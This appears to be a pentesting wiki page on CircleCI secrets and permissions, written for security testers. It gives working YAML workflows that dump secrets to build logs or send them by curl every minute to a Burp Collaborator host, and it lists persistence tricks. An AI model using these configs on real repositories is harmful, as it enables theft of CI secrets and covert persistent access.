# CircleCI
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## Basic Information [**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. ## Permissions **CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\ In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...). However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**. ## Env Variables & Secrets According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow. ### Built-in env variables Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. ### Clear text You can declare them in clear text inside a **command**: ```yaml - run: name: "set and echo" command: | SECRET="A secret" echo $SECRET ``` You can declare them in clear text inside the **run environment**: ```yaml - run: name: "set and echo" command: echo $SECRET environment: SECRET: A secret ``` You can declare them in clear text inside the **build-job environment**: ```yaml jobs: build-job: docker: - image: cimg/base:2020.01 environment: SECRET: A secret ``` You can declare them in clear text inside the **environment of a container**: ```yaml jobs: build-job: docker: - image: cimg/base:2020.01 environment: SECRET: A secret ``` ### Project Secrets These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\ You can see them **declared in** _https://app.circleci.com/settings/project/github/\/\/environment-variables_ ![](<../.gitbook/assets/image (662) (1) (1).png>) {% hint style="danger" %} The "**Import Variables**" functionality allows to **import variables from other projects** to this one. {% endhint %} ### Context Secrets These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here: ![](<../.gitbook/assets/image (661).png>) {% hint style="success" %} However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\ This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people. {% endhint %} ## Attacks ### Search Clear Text Secrets If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there. ### Secret Env Vars & Context enumeration Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\/contexts_. ### Exfiltrate Project secrets {% hint style="warning" %} In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_). {% endhint %} {% hint style="danger" %} The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**. {% endhint %} All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**: ```yaml version: 2.1 jobs: exfil-env: docker: - image: cimg/base:stable steps: - checkout - run: name: "Exfil env" command: "env | base64" workflows: exfil-env-workflow: jobs: - exfil-env ``` If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: ```yaml version: 2.1 jobs: exfil-env: docker: - image: cimg/base:stable steps: - checkout - run: name: "Exfil env" command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: exfil-env-workflow: triggers: - schedule: cron: "* * * * *" filters: branches: only: - circleci-project-setup jobs: - exfil-env ``` ### Exfiltrate Context Secrets You need to **specify the context name** (this will also exfiltrate the project secrets): ```yaml ``` ```yaml version: 2.1 jobs: exfil-env: docker: - image: cimg/base:stable steps: - checkout - run: name: "Exfil env" command: "env | base64" workflows: exfil-env-workflow: jobs: - exfil-env: context: Test-Context ``` If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**: ```yaml version: 2.1 jobs: exfil-env: docker: - image: cimg/base:stable steps: - checkout - run: name: "Exfil env" command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`" # I filter by the repo branch where this config.yaml file is located: circleci-project-setup workflows: exfil-env-workflow: triggers: - schedule: cron: "* * * * *" filters: branches: only: - circleci-project-setup jobs: - exfil-env: context: Test-Context ``` {% hint style="warning" %} Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**. {% endhint %} ### Escape to Cloud **CircleCI** gives you the option to run **your builds in their machines or in your own**.\ By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**. Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions): ```yaml jobs: exfil-env: #docker: # - image: cimg/base:stable machine: image: ubuntu-2004:current ``` Or even a docker container with access to a remote docker service: ```yaml jobs: exfil-env: docker: - image: cimg/base:stable steps: - checkout - setup_remote_docker: version: 19.03.13 ``` ### Persistence * It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access. * _https://app.circleci.com/settings/user/tokens_ * It's possible to **create projects tokens** to access the project with the permissions given to the token. * _https://app.circleci.com/settings/project/github/\/\/api_ * It's possible to **add SSH keys** to the projects. * _https://app.circleci.com/settings/project/github/\/\/ssh_ * It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday. * Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday. * If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor** * You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
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